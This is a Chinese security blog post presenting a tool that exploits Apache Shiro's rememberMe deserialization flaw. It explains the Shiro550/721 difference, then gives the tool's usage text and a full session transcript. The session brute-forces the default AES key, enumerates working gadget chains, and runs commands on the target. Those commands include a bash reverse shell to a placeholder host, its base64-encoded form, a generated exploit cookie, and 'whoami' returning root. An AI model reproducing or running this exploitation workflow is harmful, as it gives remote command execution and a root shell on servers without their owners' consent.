shiro 反序列化命令执行辅助检测工具

admin 2024年4月9日13:05:29评论9 views字数 3741阅读12分28秒阅读模式

0x01 简介

Apache Shiro 是Java 的一个安全框架。Shiro 可以非常容易的开发出足够好的应用,其不仅可以用在JavaSE 环境,也可以用在JavaEE 环境。Shiro 可以帮助我们完成:认证、授权、加密、会话管理、与Web 集成、缓存等。

0x02 指纹识别&550和721区别





主要区别在于Shiro550使用已知默认密码,只要有足够的密码,不需要Remember Cookie

Shiro721的ase加密的key为系统随机生成,需要利用登录后的rememberMe去爆破正确的key值。利用有效的RememberMe Cookie作为Padding Oracle Attack的前缀,再去构造反序列化攻击

0x02 工具使用方法

shiro 反序列化命令执行辅助检测工具

> java -jar shiro_tool.jarUsage: java -jar shiro_tool.jar https://xx.xx.xx.xxnocheck     --> skip check target is shiro or not.skip        --> all gadget default can be useredirect    --> follow redirect default:falserandomagent --> random useragentnotcheckall --> not check all gadgetuseragent=  --> set useragentcookiename= --> default: rememberMe      不是rememberMe的时候用x=          --> print resultcmd=        --> set command to rundcmd=       --> set command to run, command format base64 stringkey=        --> set a shiro keyreq=        --> request body file   request body file 抓包保存到文件里,这里写文件名keys=       --> keys file       自定义key的文件,key按行分割,即每行写一个java -cp shiro_tool.jar shiro.Check urls=批量url文件  redirectjava -cp shiro_tool.jar shiro.Check[admin@ shiro] java -jar shiro_tool.jar https://xx.xx.xx.xx/          [-] target: https://xx.xx.xx.xx/[-] target is use shiro[-] start guess shiro key.[-] shiro key: kPH+bIxk5D2deZiIxcaaaA==[-] check URLDNS[*] find: URLDNS can be use[-] check CommonsBeanutils1[*] find: CommonsBeanutils1 can be use[-] check CommonsBeanutils2[-] check CommonsCollections1[-] check CommonsCollections2[-] check CommonsCollections3[-] check CommonsCollections4[-] check CommonsCollections5[-] check CommonsCollections6[-] check CommonsCollections7[-] check CommonsCollections8[-] check CommonsCollections9[-] check CommonsCollections10[-] check CommonsCollectionsK1[-] check CommonsCollectionsK2[-] check CommonsCollectionsK3[-] check CommonsCollectionsK4[-] check Groovy1[*] find: Groovy1 can be use[-] check JSON1[*] find: JSON1 can be use[-] check Spring1[*] find: Spring1 can be use[-] check Spring2[-] check JRMPClient[*] find: JRMPClient can be use[*] JRMPClient please use: java -cp shiro_tool.jar ysoserial.exploit.JRMPListener 0: URLDNS1: CommonsBeanutils12: Groovy13: JSON14: Spring15: JRMPClient[-] please enter the number(0-6)3[-] use gadget: JSON1[*] command example: bash -i >& /dev/tcp/xx.xx.xx.xx/80 0>&1[*] command example: curl[*] if need base64 command, input should startwith bash=/powershell=/python=/perl= [-] please enter command, input q or quit to quit> curl[-] start process command: curl[-] please enter command, input q or quit to quit> bash=bash -i >& /dev/tcp/xx.xx.xx.xx/80 0>&1[-] start process command: bash -c {echo,YmFzaD1iYXNoIC1pID4mIC9kZXYvdGNwL3h4Lnh4Lnh4Lnh4LzgwIDA+JjE=}|{base64,-d}|{bash,-i}[-] please enter command, input q or quit to quit> output=on[-] print payload mode on.[-] please enter command, enter q or quit to quit, enter back to re-choose gadget> whoamikPH+bIxk5D2deZiIxcaaaA== - CommonsBeanutils1 - zEC2T+ZP+ib2g+NLMrrU0LRsNu3lr7kjq82987eI8FZxA8ckaX8LsMNHdParxVS9aYg0Oxl91WD5GztG6Dmg/QO/sjxi+kX/sFpHgqwtG4MCQoogHJkhnj73PI6Wn8AJWQyXoOGNMkyboGcEm0Ti1h+WMGQEqw57tRl7Pjr0pMr2oZcUj9huwC/Lfr090FX7vrPrU5JnQm2Qo7ZrMPnxENXs0yMT6HfU75OejeF6kXbWTaGlvfByscF1ljoDR/k2txdQ1eK4nZ4ReOAqMuUeeaXwirEw2kg58GktvB2Ghw4egXJBQUdP3H8iE+zrkf12YlPs/RAOq8w0mWfvwB7EnCW3Z83YP8vV1+reLT9oNyUpCfjKyQVodnpZJY7If4F9al8He7E832RR3mhFvsjJDyNFTbB4TPrRqFDehSVuHib5qkh0s0YjvCGErxDLH9pFS4G9rNYQeAnXBKeNzS5q2O0xCe5xg4X6l8R6XsU2/V1d6wd27U7u18+DJlo/v58vjSyUtUaEAAuMN9C30Rr+r7Tk9MVC55eS8l82fURpUwttcRADhJ0esKHAFFAkwnisbAb4Uugz3IADojYlHBNFtWFuV2dsuqkionEROKLIdVHJGR8URmk79v8lbLbpCWI3cTCf81SwwBoYylKXCyHX2X08VlEUvuHWkypx9gVvDuQQQFTGP4ljwpU1NlQPqxaLXmnZ5TyJN2sycL9s8VWMYls4uFATtMkpXXcwaQGFVjCzFrABv[-] please enter command, enter q or quit to quit, enter back to re-choose gadget> x=whoamiroot[-] please enter command, enter q or quit to quit, enter back to re-choose gadget> quit[-] start process command: quit[-] quit

0x03 下载地址


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  • 本文由 发表于 2024年4月9日13:05:29
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                   shiro 反序列化命令执行辅助检测工具


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